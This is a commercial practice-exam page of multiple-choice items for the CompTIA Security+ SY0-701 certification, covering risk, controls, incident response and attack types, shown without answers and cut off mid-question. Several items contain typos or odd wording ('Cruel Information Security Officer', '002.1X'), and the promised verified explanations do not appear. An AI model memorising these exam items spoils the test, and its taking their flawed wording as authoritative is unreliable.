Summer Certification Sale Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: pass65

Free Practice Questions for the CompTIA Security+ SY0-701 Exam (2026 Updated)

At Marks4sure, we are dedicated to providing IT professionals with the most accurate and reliable preparation materials for the CompTIA SY0-701 exam. To support your certification journey, we have made a selection of our premium 2026 CompTIA Security+ practice questions and answers available completely free. You can take this practice test as many times as you need. Every question includes a detailed, expertly verified explanation to ensure you fully grasp the core security concepts before test day.

Questions 4

Prior to implementing a design change, the change must go through multiple steps to ensure that it does not cause any security issues. Which of the following is most likely to be one of those steps?

Options:

A.

Management review

B.

Load testing

C.

Maintenance notifications

D.

Procedure updates

Buy Now
Questions 5

A security company informs its customers of a new vulnerability that affects web applications. The vulnerability does not have an available patch at the moment. Which of the following best describes this vulnerability?

Options:

A.

Zero-day

B.

XSS

C.

SQLi

D.

Buffer overflow

Buy Now

SY0-701 Report Card

Questions 6

A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the SaaS vendor. Which of the following processes is the analyst most likely conducting?

Options:

A.

Internal audit

B.

Penetration testing

C.

Attestation

D.

Due diligence

Buy Now
Questions 7

An IT administrator needs to ensure data retention standards are implemented on an enterprise application. Which of the following describes the administrator ' s role?

Options:

A.

Processor

B.

Custodian

C.

Privacy officer

D.

Owner

Buy Now
Questions 8

A company wants to get alerts when others are researching and doing reconnaissance on the company One approach would be to host a part of the Infrastructure online with known vulnerabilities that would appear to be company assets. Which of the following describes this approach?

Options:

A.

Watering hole

B.

Bug bounty

C.

DNS sinkhole

D.

Honeypot

Buy Now
Questions 9

An organization disabled unneeded services and placed a firewall in front of a business-critical legacy system. Which of the following best describes the actions taken by the organization?

Options:

A.

Exception

B.

Segmentation

C.

Risk transfer

D.

Compensating controls

Buy Now
Questions 10

A company is concerned with supply chain compromise of new servers and wants to limit this risk. Which of the following should the company review first?

Options:

A.

Sanitization procedure

B.

Acquisition process

C.

Change management

D.

Asset tracking

Buy Now
Questions 11

A systems administrator needs to ensure the secure communication of sensitive data within the organization ' s private cloud. Which of the following is the best choice for the administrator to implement?

Options:

A.

IPSec

B.

SHA-1

C.

RSA

D.

TGT

Buy Now
Questions 12

A security analyst is monitoring logs from the organization ' s SIEM and identifies logs related to one of their salespeople:

Time | IP address | Location | EmpID | App | Status

14:02 | 72.45.38.27 | Atlanta | 25687 | VPN | Success

14:04 | 72.45.38.27 | Atlanta | 25687 | Email | Failure

14:07 | 58.67.47.48 | Beijing | 25687 | VPN | Success

14:15 | 72.45.38.27 | Atlanta | 25687 | Teams | Success

Which of the following is being displayed in the logs?

Options:

A.

Impossible travel

B.

SMTP replay

C.

Directory traversal

D.

Cross-site request forgery

Buy Now
Questions 13

Which of the following cryptographic solutions protects data at rest?

Options:

A.

Digital signatures

B.

Full disk encryption

C.

Private key

D.

Steganography

Buy Now
Questions 14

Which of the following tools is best for logging and monitoring in a cloud environment?

Options:

A.

IPS

B.

FIM

C.

NAC

D.

SIEM

Buy Now
Questions 15

An administrator at a small business notices an increase in support calls from employees who receive a blocked page message after trying to navigate to a spoofed website. Which of the following should the administrator do?

Options:

A.

Deploy multifactor authentication.

B.

Decrease the level of the web filter settings

C.

Implement security awareness training.

D.

Update the acceptable use policy

Buy Now
Questions 16

An organization experiences a suspected data breach that affects sensitive client information. The incident response team must preserve logs, server images, and email communications related to the breach. Which of the following best describes this course of action?

Options:

A.

Maintaining the chain of custody

B.

Performing root cause analysis

C.

Enforcing a legal hold

D.

Conducting a containment activity

Buy Now
Questions 17

A systems administrator receives the following alert from a file integrity monitoring tool:

The hash of the cmd.exe file has changed.

The systems administrator checks the OS logs and notices that no patches were applied in the last two months. Which of the following most likely occurred?

Options:

A.

The end user changed the file permissions.

B.

A cryptographic collision was detected.

C.

A snapshot of the file system was taken.

D.

A rootkit was deployed.

Buy Now
Questions 18

A security administrator is reissuing a former employee ' s laptop. Which of the following is the best combination of data handling activities for the administrator to perform? (Select two).

Options:

A.

Data retention

B.

Certification

C.

Tokenization

D.

Classification

E.

Sanitization

F.

Enumeration

Buy Now
Questions 19

A security engineer would like to enhance the use of automation and orchestration within the SIEM. Which of the following would be the primary benefit of this enhancement?

Options:

A.

It increases complexity.

B.

It removes technical debt.

C.

It adds additional guard rails.

D.

It acts as a workforce multiplier.

Buy Now
Questions 20

As part of new compliance audit requirements, multiple servers need to be segmented on different networks and should be reachable only from authorized internal systems. Which of the following would meet the requirements?

Options:

A.

Configure firewall rules to block external access to Internal resources.

B.

Set up a WAP to allow internal access from public networks.

C.

Implement a new IPSec tunnel from internal resources.

D.

Deploy an Internal Jump server to access resources.

Buy Now
Questions 21

A forensic engineer determines that the root cause of a compromise is a SQL injection attack. Which of the following should the engineer review to identify the command used by the threat actor?

Options:

A.

Metadata

B.

Application log

C.

System log

D.

Netflow log

Buy Now
Questions 22

A network engineer is increasing the overall security of network devices and needs to harden the devices. Which of the following will best accomplish this task?

Options:

A.

Configuring centralized logging

B.

Generating local administrator accounts

C.

Replacing Telnet with SSH

D.

Enabling HTTP administration

Buy Now
Questions 23

Which of the following can be used to compromise a system that is running an RTOS?

Options:

A.

Cross-site scripting

B.

Memory injection

C.

Replay attack

D.

Ransomware

Buy Now
Questions 24

A security technician determines that no additional patches can be applied to an application and the risks of operating as such must be accepted. Additionally, only a limited number of network services should utilize the application. Which of the following best describes this type of mitigation?

Options:

A.

Patching

B.

Segmentation

C.

Isolation

D.

Monitoring

Buy Now
Questions 25

Which of the following would best ensure a controlled version release of a new software application?

Options:

A.

Business continuity planning

B.

Quantified risk analysis

C.

Static code analysis

D.

Change management procedures

Buy Now
Questions 26

A company is aware of a given security risk related to a specific market segment. The business chooses not to accept responsibility and target their services to a different market segment. Which of the following describes this risk management strategy?

Options:

A.

Exemption

B.

Exception

C.

Avoid

D.

Transfer

Buy Now
Questions 27

A company is utilizing an offshore team to help support the finance department. The company wants to keep the data secure by keeping it on a company device but does not want to provide equipment to the offshore team. Which of the following should the company implement to meet this requirement?

Options:

A.

VDI

B.

MDM

C.

VPN

D.

VPC

Buy Now
Questions 28

Which of the following is an example of a false negative vulnerability detection in a scan report?

Options:

A.

A vulnerability that does not actually exist

B.

A vulnerability that has already been remediated

C.

A result that shows no known vulnerability

D.

A zero-day vulnerability with a known remediation

Buy Now
Questions 29

A security engineer receives reports of unauthorized devices on the organization ' s network. Which of the following best describes a secure and effective way to mitigate the risks?

Options:

A.

Deploy a NAC solution to block wireless connections until devices can be verified against the baseline configuration.

B.

Set the NAC solution to only accept handshakes initiated from a static set of IP addresses.

C.

Configure a NAC solution to enforce 802.1X authentication with device certificates and implement endpoint security checks.

D.

Implement a NAC solution that redirects all devices to the guest Wi-Fi for holding until a security analyst can validate the security compliance.

Buy Now
Questions 30

A company plans to secure its systems by:

Preventing users from sending sensitive data over corporate email

Restricting access to potentially harmful websites

Which of the following features should the company set up? (Select two).

Options:

A.

DLP software

B.

DNS filtering

C.

File integrity monitoring

D.

Stateful firewall

Buy Now
Questions 31

Which of the following activities is included in the post-incident review phase?

Options:

A.

Determining the root cause of the incident

B.

Developing steps to mitigate the risks of the incident

C.

Validating the accuracy of the evidence collected during the investigation

D.

Reestablishing the compromised system ' s configuration and settings

Buy Now
Questions 32

A company discovers suspicious transactions that were entered into the company ' s database and attached to a user account that was created as a trap for malicious activity. Which of the following is the user account an example of?

Options:

A.

Honeytoken

B.

Honeynet

C.

Honeypot

D.

Honeyfile

Buy Now
Questions 33

Various company stakeholders meet to discuss roles and responsibilities in the event of a security breach affecting offshore offices. Which of the following is this an example of?

Options:

A.

Tabletop exercise

B.

Penetration test

C.

Geographic dispersion

D.

Incident response

Buy Now
Questions 34

A company is implementing a vendor ' s security tool in the cloud. The security director does not want to manage users and passwords specific to this tool but would rather utilize the company ' s standard user directory. Which of the following should the company implement?

Options:

A.

802.1X

B.

SAML

C.

RADIUS

D.

CHAP

Buy Now
Questions 35

Users at a company are reporting they are unable to access the URL for a new retail website because it is flagged as gambling and is being blocked.

Which of the following changes would allow users to access the site?

Options:

A.

Creating a firewall rule to allow HTTPS traffic

B.

Configuring the IPS to allow shopping

C.

Tuning the DLP rule that detects credit card data

D.

Updating the categorization in the content filter

Buy Now
Questions 36

A security administrator protects passwords by using hashing. Which of the following best describes what the administrator is doing?

Options:

A.

Adding extra characters at the end to increase password length

B.

Generating a token to make the passwords temporal

C.

Using mathematical algorithms to make passwords unique

D.

Creating a rainbow table to protect passwords in a list

Buy Now
Questions 37

Which of the following is most likely to cause reputational damage to a company?

Options:

A.

Open ports

B.

Low availability

C.

Unpatched vulnerabilities

D.

Data leaks

Buy Now
Questions 38

A company has a website in a server cluster. One server is experiencing very high usage, while others are nearly unused. Which of the following should the company configure to help distribute traffic quickly?

Options:

A.

Server multiprocessing

B.

Warm site

C.

Load balancer

D.

Proxy server

Buy Now
Questions 39

A security engineer needs to analyze the implications of moving proprietary company data from a local server to a public cloud storage service. Which of the following actions should the engineer take first?

Options:

A.

Create an architecture diagram of cloud storage solutions.

B.

Migrate sample data to the cloud to run security tests.

C.

Agree on data classification labels with stakeholders.

D.

Make a backup of the data on cloud-neutral storage.

Buy Now
Questions 40

A security consultant needs secure, remote access to a client environment. Which of the following should the security consultant most likely use to gain access?

Options:

A.

EAP

B.

DHCP

C.

IPSec

D.

NAT

Buy Now
Questions 41

A manager receives an email that contains a link to receive a refund. After hovering over the link, the manager notices that the domain ' s URL points to a suspicious link. Which of the following security practices helped the manager to identify the attack?

Options:

A.

End user training

B.

Policy review

C.

URL scanning

D.

Plain text email

Buy Now
Questions 42

Which of the following should a technician perform to verify the integrity of a file transferred from one device to another?

Options:

A.

Authentication

B.

Obfuscation

C.

Hashing

D.

Encryption

Buy Now
Questions 43

An administrator has configured a quarantine subnet for all guest devices that connect to the network. Which of the following would be best for the security team to configure on the MDM before allowing access to corporate resources?

Options:

A.

Device fingerprinting

B.

Compliance attestation

C.

NAC

D.

802.1X

Buy Now
Questions 44

Which of the following should be used to select a label for a file based on the file ' s value, sensitivity, or applicable regulations?

Options:

A.

Verification

B.

Certification

C.

Classification

D.

Inventory

Buy Now
Questions 45

Which of the following data recovery strategies will result in a quick recovery at low cost?

Options:

A.

Hot

B.

Cold

C.

Manual

D.

Warm

Buy Now
Questions 46

An organization ' s web servers host an online ordering system. The organization discovers that the servers are vulnerable to a malicious JavaScript injection, which could allow attackers to access customer payment information. Which of the following mitigation strategies would be most effective for preventing an attack on the organization ' s web servers? (Select two).

Options:

A.

Regularly updating server software and patches

B.

Implementing strong password policies

C.

Encrypting sensitive data at rest and in transit

D.

Utilizing a web-application firewall

E.

Performing regular vulnerability scans

F.

Removing payment information from the servers

Buy Now
Questions 47

An employee clicks a malicious link in an email that appears to be from the company ' s Chief Executive Officer. The employee ' s computer is infected with ransomware that encrypts the company ' s files. Which of the following is the most effective way for the company to prevent similar incidents in the future?

Options:

A.

Security awareness training

B.

Database encryption

C.

Segmentation

D.

Reporting suspicious emails

Buy Now
Questions 48

A systems administrator is concerned about vulnerabilities within cloud computing instances Which of the following is most important for the administrator to consider when architecting a cloud computing environment?

Options:

A.

SQL injection

B.

TOC/TOU

C.

VM escape

D.

Tokenization

E.

Password spraying

Buy Now
Questions 49

The number of tickets the help desk has been receiving has increased recently due to numerous false-positive phishing reports. Which of the following would be best to help to reduce the false positives?

Options:

A.

Performing more phishing simulation campaigns

B.

Improving security awareness training

C.

Hiring more help desk staff

D.

Implementing an incident reporting web page

Buy Now
Questions 50

A company performs a risk assessment on the information security program each year. Which of the following best describes this risk assessment?

Options:

A.

Recurring

B.

Ad hoc

C.

One time

D.

Continuous

Buy Now
Questions 51

Which of the following can best protect against an employee inadvertently installing malware on a company system?

Options:

A.

Host-based firewall

B.

System isolation

C.

Least privilege

D.

Application allow list

Buy Now
Questions 52

Which of the following activities uses OSINT?

Options:

A.

Social engineering testing

B.

Data analysis of logs

C.

Collecting evidence of malicious activity

D.

Producing IOC for malicious artifacts

Buy Now
Questions 53

Which of the following is a qualitative approach to risk analysis?

Options:

A.

Including the MTTR and MTBF as part of the risk assessment

B.

Tracking and documenting network risks using a risk register

C.

Assigning a level of high, medium, or low to the risk rating

D.

Using ALE and ARO to help determine whether a risk should be mitigated

Buy Now
Questions 54

Which of the following should an internal auditor check for first when conducting an audit of the organization ' s risk management program?

Options:

A.

Policies and procedures

B.

Asset management

C.

Vulnerability assessment

D.

Business impact analysts

Buy Now
Questions 55

During a SQL update of a database, a temporary field used as part of the update sequence was modified by an attacker before the update completed in order to allow access to the system. Which of the following best describes this type of vulnerability?

Options:

A.

Race condition

B.

Memory injection

C.

Malicious update

D.

Side loading

Buy Now
Questions 56

Which of the following risk management strategies should an enterprise adopt first if a legacy application is critical to business operations and there are preventative controls that are not yet implemented?

Options:

A.

Mitigate

B.

Accept

C.

Transfer

D.

Avoid

Buy Now
Questions 57

Which of the following actions must an organization take to comply with a person ' s request for the right to be forgotten?

Options:

A.

Purge all personally identifiable attributes.

B.

Encrypt all of the data.

C.

Remove all of the person’s data.

D.

Obfuscate all of the person’s data.

Buy Now
Questions 58

Which of the following is the most likely motivation for a company administrator to look at an employee ' s personal information in a database?

Options:

A.

Ideological differences

B.

General curiosity

C.

Gain influence

D.

Intellectual property

Buy Now
Questions 59

Which of the following describes a situation where a user is authorized before being authenticated?

Options:

A.

Privilege escalation

B.

Race condition

C.

Tailgating

D.

Impersonation

Buy Now
Questions 60

Which of the following must be considered when designing a high-availability network? (Choose two).

Options:

A.

Ease of recovery

B.

Ability to patch

C.

Physical isolation

D.

Responsiveness

E.

Attack surface

F.

Extensible authentication

Buy Now
Questions 61

Which of the following would be the best solution to deploy a low-cost standby site that includes hardware and internet access?

Options:

A.

Recovery site

B.

Cold site

C.

Hot site

D.

Warm site

Buy Now
Questions 62

A software developer released a new application and is distributing application files via the developer’s website. Which of the following should the developer post on the website to allow users to verify the integrity of the downloaded files?

Options:

A.

Hashes

B.

Certificates

C.

Algorithms

D.

Salting

Buy Now
Questions 63

The management team reports employees are missing features on company-provided tablets, causing productivity issues. The team directs IT to resolve the issue within 48 hours. Which of the following is the best solution?

Options:

A.

EDR

B.

COPE

C.

MDM

D.

FDE

Buy Now
Questions 64

Which of the following involves an attempt to take advantage of database misconfigurations?

Options:

A.

Buffer overflow

B.

SQL injection

C.

VM escape

D.

Memory injection

Buy Now
Questions 65

A security analyst must select a metric to determine the required investment in technology based on past availability incidents. Which of the following is the most relevant value to help select technology that mitigates risk and considers reliability?

Options:

A.

MTBF

B.

RTO

C.

ALE

D.

RPO

Buy Now
Questions 66

Which of the following strategies should an organization use to efficiently manage and analyze multiple types of logs?

Options:

A.

Deploy a SIEM solution

B.

Create custom scripts to aggregate and analyze logs

C.

Implement EDR technology

D.

Install a unified threat management appliance

Buy Now
Questions 67

Which of the following resources is the most useful for a researcher to find more details about threat activities?

Options:

A.

Risk register

B.

Audit report

C.

Dark web

D.

Bug bounty submissions

Buy Now
Questions 68

An administrator wants to automate an account permissions update for a large number of accounts. Which of the following would best accomplish this task?

Options:

A.

Security groups

B.

Federation

C.

User provisioning

D.

Vertical scaling

Buy Now
Questions 69

A systems administrator receives an alert that a company ' s internal file server is very slow and is only working intermittently. The systems administrator reviews the server management software and finds the following information about the server:

SY0-701 Question 69

Which of the following indicators most likely triggered this alert?

Options:

A.

Concurrent session usage

B.

Network saturation

C.

Account lockout

D.

Resource consumption

Buy Now
Questions 70

Which of the following security controls is a company implementing by deploying HIPS? (Select two)

Options:

A.

Directive

B.

Preventive

C.

Physical

D.

Corrective

E.

Compensating

F.

Detective

Buy Now
Questions 71

An office wants to install a Wi-Fi network. The security team must ensure a secure design. The access points will be more powerful and use WPA3 with a 16-character randomized key. Which of the following should the security team do next?

Options:

A.

Create a heat map of the building perimeter.

B.

Deploy IPSec tunnels from each access point to the controller.

C.

Enable WPA2-PSK with a 24-character randomized key.

D.

Disable SSH administration on all access points.

Buy Now
Questions 72

Which of the following data types relates to data sovereignty?

Options:

A.

Data classified as public in other countries

B.

Personally Identifiable data while traveling

C.

Health data shared between doctors in other nations

D.

Data at rest outside of a country ' s borders

Buy Now
Questions 73

An employee who was working remotely lost a mobile device containing company data. Which of the following provides the best solution to prevent future data loss?

Options:

A.

MDM

B.

DLP

C.

FDE

D.

EDR

Buy Now
Questions 74

A security analyst finds a rogue device during a monthly audit of current endpoint assets that are connected to the network. The corporate network utilizes 002.1X for access control. To be allowed on the network, a device must have a Known hardware address, and a valid user name and password must be entered in a captive portal. The following is the audit report:

SY0-701 Question 74

Which of the following is the most likely way a rogue device was allowed to connect?

Options:

A.

A user performed a MAC cloning attack with a personal device.

B.

A DMCP failure caused an incorrect IP address to be distributed

C.

An administrator bypassed the security controls for testing.

D.

DNS hijacking let an attacker intercept the captive portal traffic.

Buy Now
Questions 75

A security analyst receives alerts about an internal system sending a large amount of unusual DNS queries to systems on the internet over short periods of time during non-business hours. Which of the following is most likely occurring?

Options:

A.

A worm is propagating across the network.

B.

Data is being exfiltrated.

C.

A logic bomb is deleting data.

D.

Ransomware is encrypting files.

Buy Now
Questions 76

Which of the following would be the best way to handle a critical business application that is running on a legacy server?

Options:

A.

Segmentation

B.

Isolation

C.

Hardening

D.

Decommissioning

Buy Now
Questions 77

A security analyst estimates that a small security incident will cost $10,000 and will occur twice per year. The analyst recommends a budget of $20,000 for next year. Which of the following does the $10,000 represent?

Options:

A.

ARO

B.

SLE

C.

ALE

D.

RPO

Buy Now
Questions 78

An administrator investigating an incident is concerned about the downtime of a critical server due to a failed drive. Which of the following would the administrator use to estimate the time needed to fix the issue?

Options:

A.

MTTR

B.

MTBF

C.

RTO

D.

RPO

Buy Now
Questions 79

A small business initially plans to open common communications ports (21, 22, 25, 80, 443) on its firewall to allow broad access to its screened subnet. However, their security consultant advises against this action. Which of the following security principles is the consultant addressing?

Options:

A.

Secure access service edge

B.

Attack surface

C.

Least privilege

D.

Separation of duties

Buy Now
Questions 80

A Chief Information Officer wants to ensure that network devices cannot connect to the public internet or the local network to directly perform firmware updates. The IT team must manually perform the update process by using a portable device. Which of the following architecture types best fits this description?

Options:

A.

Microservices

B.

Air-gapped

C.

Software-defined networking

D.

Serverless

Buy Now
Questions 81

An administrator discovers that some files on a database server were recently encrypted. The administrator sees from the security logs that the data was last accessed by a domain user. Which of the following best describes the type of attack that occurred?

Options:

A.

Insider threat

B.

Social engineering

C.

Watering-hole

D.

Unauthorized attacker

Buy Now
Questions 82

Which of the following best explains the use of a policy engine in a Zero Trust environment?

Options:

A.

It is used by a central server to apply default permissions across a range of network and computing resources.

B.

It is used to make access control decisions without inheriting permission decisions from prior events.

C.

It is used to dynamically assign user permissions based on a user ' s identity and previous activity.

D.

It is used when user roles are unknown and the organization wants to leverage ML to control access.

Buy Now
Questions 83

Which of the following explains why an attacker cannot easily decrypt passwords using a rainbow table attack?

Options:

A.

Digital signatures

B.

Salting

C.

Hashing

D.

Perfect forward secrecy

Buy Now
Questions 84

A developer receives this message when testing a new external website:

This site cannot be reached.

Which of the following logs would most likely help identify the root cause?

Options:

A.

Firewall

B.

IDS

C.

Application

D.

System

Buy Now
Questions 85

An organization experiences a cybersecurity incident involving a command-and-control server. Which of the following logs should be analyzed to identify the impacted host? (Select two).

Options:

A.

Application

B.

Authentication

C.

DHCP

D.

Network

E.

Firewall

F.

Database

Buy Now
Questions 86

A security team is setting up a new environment for hosting the organization ' s on-premises software application as a cloud-based service. Which of the following should the team ensure is in place in order for the organization to follow security best practices?

Options:

A.

Visualization and isolation of resources

B.

Network segmentation

C.

Data encryption

D.

Strong authentication policies

Buy Now
Questions 87

A company requires hard drives to be securely wiped before sending decommissioned systems to recycling. Which of the following best describes this policy?

Options:

A.

Enumeration

B.

Sanitization

C.

Destruction

D.

Inventory

Buy Now
Questions 88

A small business uses kiosks on the sales floor to display product information for customers. A security team discovers the kiosks use end-of-life operating systems. Which of the following is the security team most likely to document as a security implication of the current architecture?

Options:

A.

Patch availability

B.

Product software compatibility

C.

Ease of recovery

D.

Cost of replacement

Buy Now
Questions 89

A security engineer is working to address the growing risks that shadow IT services are introducing to the organization. The organization has taken a cloud-first approach end does not have an on-premises IT infrastructure. Which of the following would best secure the organization?

Options:

A.

Upgrading to a next-generation firewall

B.

Deploying an appropriate in-line CASB solution

C.

Conducting user training on software policies

D.

Configuring double key encryption in SaaS platforms

Buy Now
Questions 90

Which of the following should a security administrator adhere to when setting up a new set of firewall rules?

Options:

A.

Disaster recovery plan

B.

Incident response procedure

C.

Business continuity plan

D.

Change management procedure

Buy Now
Questions 91

Which of the following types of vulnerabilities is primarily caused by improper use and management of cryptographic certificates?

Options:

A.

Misconfiguration

B.

Resource reuse

C.

Insecure key storage

D.

Weak cipher suites

Buy Now
Questions 92

Which of the following explains how regular patching helps mitigate risks when securing an enterprise environment?

Options:

A.

It improves server performance by reducing software bugs.

B.

It addresses known software vulnerabilities before they are exploited.

C.

It eliminates the need for firewalls and intrusion detection.

D.

It removes the need for antivirus tools.

Buy Now
Questions 93

The security operations center is researching an event concerning a suspicious IP address A security analyst looks at the following event logs and discovers that a significant portion of the user accounts have experienced faded log-In attempts when authenticating from the same IP address:

SY0-701 Question 93

Which of the following most likely describes attack that took place?

Options:

A.

Spraying

B.

Brute-force

C.

Dictionary

D.

Rainbow table

Buy Now
Questions 94

Which of the following allows an exploit to go undetected by the operating system?

Options:

A.

Firmware vulnerabilities

B.

Side loading

C.

Memory injection

D.

Encrypted payloads

Buy Now
Questions 95

Which of the following are the most important considerations when encrypting data? (Select two).

Options:

A.

Obfuscation

B.

Algorithms

C.

Data masking

D.

Key length

E.

Tokenization

F.

Salting

Buy Now
Questions 96

Which of the following consequences would a retail chain most likely face from customers in the event the retailer is non-compliant with PCI DSS?

Options:

A.

Contractual impacts

B.

Sanctions

C.

Fines

D.

Reputational damage

Buy Now
Questions 97

A company ' s accounting department receives an urgent payment message from the company ' s bank domain with instructions to wire transfer funds. The sender requests that the transfer be completed as soon as possible. Which of the following attacks is described?

Options:

A.

Business email compromise

B.

Vishing

C.

Spear phishing

D.

Impersonation

Buy Now
Questions 98

A security administrator receives multiple reports about the same suspicious email. Which of the following is the most likely reason for the malicious email ' s continued delivery?

Options:

A.

Employees are flagging legitimate emails as spam.

B.

Information from reported emails is not being used to tune email filtering tools.

C.

Employees are using shadow IT solutions for email.

D.

Employees are forwarding personal emails to company email addresses.

Buy Now
Questions 99

The Cruel Information Security Officer (CISO) asks a security analyst to install an OS update to a production VM that has a 99% uptime SLA. The CISO tells me analyst the installation must be done as quickly as possible. Which of the following courses of action should the security analyst take first?

Options:

A.

Log in to the server and perform a health check on the VM.

B.

Install the patch Immediately.

C.

Confirm that the backup service is running.

D.

Take a snapshot of the VM.

Buy Now
Questions 100

A company expects its provider to ensure servers and networks maintain 97% uptime. Which of the following would most likely list this expectation?

Options:

A.

BPA

B.

MOU

C.

NDA

D.

SLA

Buy Now
Questions 101

A company needs to determine whether authentication weaknesses in a customer-facing web application exist. Which of the following is the best technique to use?

Options:

A.

Static analysis

B.

Packet capture

C.

Agent-based scanning

D.

Dynamic analysis

E.

Network-based scanning

Buy Now
Questions 102

A security analyst wants to better understand the behavior of users and devices in order to gain visibility into potential malicious activities. The analyst needs a control to detect when actions deviate from a common baseline Which of the following should the analyst use?

Options:

A.

Intrusion prevention system

B.

Sandbox

C.

Endpoint detection and response

D.

Antivirus

Buy Now
Questions 103

Which of the following is used to add extra complexity before using a one-way data transformation algorithm?

Options:

A.

Key stretching

B.

Data masking

C.

Steganography

D.

Salting

Buy Now
Questions 104

A company prepares for an upcoming regulatory audit. The company wants to perform a gap analysis in the most cost-effective way. Which of the following will help the company achieve this goal?

Options:

A.

Internal self-assessment

B.

Active reconnaissance

C.

Red team penetration test

D.

Tabletop exercise

Buy Now
Questions 105

An organization wants a third-party vendor to do a penetration test that targets a specific device. The organization has provided basic information about the device. Which of the following best describes this kind of penetration test?

Options:

A.

Partially known environment

B.

Unknown environment

C.

Integrated

D.

Known environment

Buy Now
Questions 106

In order to cut costs, a company decides to implement a bring-your-own-device policy. The security team wants a solution that will reduce risk to company data, especially in cases in which devices are lost or stolen. Which of the following tools is best to address this concern?

Options:

A.

Mobile device management

B.

Endpoint detection and response

C.

Host-based intrusion detection system

D.

Data loss prevention

Buy Now
Questions 107

Which of the following activities is the first stage in the incident response process?

Options:

A.

Detection

B.

Declaration

C.

Containment

D.

Vacation

Buy Now
Questions 108

Which of the following vulnerabilities is exploited when an attacker overwrites a register with a malicious address?

Options:

A.

VM escape

B.

SQL injection

C.

Buffer overflow

D.

Race condition

Buy Now
Questions 109

Which of the following organizational documents is most often used to establish and communicate expectations associated with integrity and ethical behavior within an organization?

Options:

A.

AUP

B.

SLA

C.

EULA

D.

MOA

Buy Now
Questions 110

Which of the following would be best suited for constantly changing environments?

Options:

A.

RTOS

B.

Containers

C.

Embedded systems

D.

SCADA

Buy Now
Questions 111

A bank insists all of its vendors must prevent data loss on stolen laptops. Which of the following strategies is the bank requiring?

Options:

A.

Encryption at rest

B.

Masking

C.

Data classification

D.

Permission restrictions

Buy Now
Questions 112

Which of the following is the best way to prevent an unauthorized user from plugging a laptop into an employee ' s phone network port and then using tools to scan for database servers?

Options:

A.

MAC filtering

B.

Segmentation

C.

Certification

D.

Isolation

Buy Now
Questions 113

A company prevented direct access from the database administrators’ workstations to the network segment that contains database servers. Which of the following should a database administrator use to access the database servers?

Options:

A.

Jump server

B.

RADIUS

C.

HSM

D.

Load balancer

Buy Now
Questions 114

Which of the following is a risk of conducting a vulnerability assessment?

Options:

A.

A disruption of business operations

B.

Unauthorized access to the system

C.

Reports of false positives

D.

Finding security gaps in the system

Buy Now
Questions 115

A company installed cameras and added signs to alert visitors that they are being recorded. Which of the following controls did the company implement? (Select two).

Options:

A.

Directive

B.

Deterrent

C.

Preventive

D.

Detective

E.

Corrective

F.

Technical

Buy Now
Questions 116

Which of the following is the stage in an investigation when forensic images are obtained?

Options:

A.

Acquisition

B.

Preservation

C.

Reporting

D.

E-discovery

Buy Now
Questions 117

An incident response specialist must stop a malicious attack from expanding to other parts of an organization. Which of the following should the incident response specialist perform first?

Options:

A.

Eradication

B.

Recovery

C.

Containment

D.

Simulation

Buy Now
Questions 118

After a series of account compromises and credential misuse, a company hires a security manager to develop a security program. Which of the following steps should the security manager take first to increase security awareness?

Options:

A.

Evaluate tools that identify risky behavior and distribute reports on the findings.

B.

Send quarterly newsletters that explain the importance of password management.

C.

Develop phishing campaigns and notify the management team of any successes.

D.

Update policies and handbooks to ensure all employees are informed of the new procedures.

Buy Now
Questions 119

After creating a contract for IT contractors, the human resources department changed several clauses. The contract has gone through three revisions. Which of the following processes should the human resources department follow to track revisions?

Options:

A.

Version validation

B.

Version changes

C.

Version updates

D.

Version control

Buy Now
Questions 120

A vendor needs to remotely and securely transfer files from one server to another using the command line. Which of the following protocols should be Implemented to allow for this type of access? (Select two).

Options:

A.

SSH

B.

SNMP

C.

RDP

D.

S/MIME

E.

SMTP

F.

SFTP

Buy Now
Questions 121

During a routine audit, an analyst discovers that a department uses software that was not vetted. Which threat is this?

Options:

A.

Espionage

B.

Data exfiltration

C.

Shadow IT

D.

Zero-day

Buy Now
Questions 122

Which of the following receives logs from various devices and services, and then presents alerts?

Options:

A.

SIEM

B.

SCADA

C.

SNMP

D.

SCAP

Buy Now
Questions 123

A penetration tester is testing the security of a building’s alarm system. Which type of penetration test is being conducted?

Options:

A.

Physical

B.

Defensive

C.

Integrated

D.

Continuous

Buy Now
Questions 124

Which of the following describes the procedures a penetration tester must follow while conducting a test?

Options:

A.

Rules of engagement

B.

Rules of acceptance

C.

Rules of understanding

D.

Rules of execution

Buy Now
Questions 125

Which of the following is a type of vulnerability that involves inserting scripts into web-based applications in order to take control of the client ' s web browser?

Options:

A.

SQL injection

B.

Cross-site scripting

C.

Zero-day exploit

D.

On-path attack

Buy Now
Questions 126

A company processes personal data from customers in multiple countries. Which of the following actions is most critical for maintaining legal compliance with global privacy regulations?

Options:

A.

Storing all customer data on encrypted local servers

B.

Hiring a data privacy officer to review contracts

C.

Ensuring DPAs are in place with third-party vendors

D.

Using strong passwords and firewalls on all endpoints

Buy Now
Questions 127

A systems administrator receives a text message from an unknown number claiming to be the Chief Executive Officer of the company. The message states an emergency situation requires a password reset. Which of the following threat vectors is being used?

Options:

A.

Typosquatting

B.

Smishing

C.

Pretexting

D.

Impersonation

Buy Now
Questions 128

A technician needs to apply a high-priority patch to a production system. Which of the following steps should be taken first?

Options:

A.

Air gap the system.

B.

Move the system to a different network segment.

C.

Create a change control request.

D.

Apply the patch to the system.

Buy Now
Questions 129

An employee from the accounting department logs in to a website. A desktop application automatically downloads on the employee ' s computer. Which of the following has occurred?

Options:

A.

XSS

B.

Watering hole

C.

Typosquatting

D.

Buffer overflow

Buy Now
Questions 130

Which of the following is die most important security concern when using legacy systems to provide production service?

Options:

A.

Instability

B.

Lack of vendor support

C.

Loss of availability

D.

Use of insecure protocols

Buy Now
Questions 131

A database administrator is updating the company ' s SQL database, which stores credit card information for pending purchases. Which of the following is the best method to secure the data against a potential breach?

Options:

A.

Hashing

B.

Obfuscation

C.

Tokenization

D.

Masking

Buy Now
Questions 132

Which of the following agreements defines response time, escalation points, and performance metrics?

Options:

A.

BPA

B.

MOA

C.

NDA

D.

SLA

Buy Now
Questions 133

Which of the following threat actors is the most likely to use large financial resources to attack critical systems located in other countries?

Options:

A.

Insider

B.

Unskilled attacker

C.

Nation-state

D.

Hacktivist

Buy Now
Questions 134

A customer of a large company receives a phone call from someone claiming to work for the company and asking for the customer ' s credit card information. The customer sees the caller ID is the same as the company ' s main phone number. Which of the following attacks is the customer most likely a target of?

Options:

A.

Phishing

B.

Whaling

C.

